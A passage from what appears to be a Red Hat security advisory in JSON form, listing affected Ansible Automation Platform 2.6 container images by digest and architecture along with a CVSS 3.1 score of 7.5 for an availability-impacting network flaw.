"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
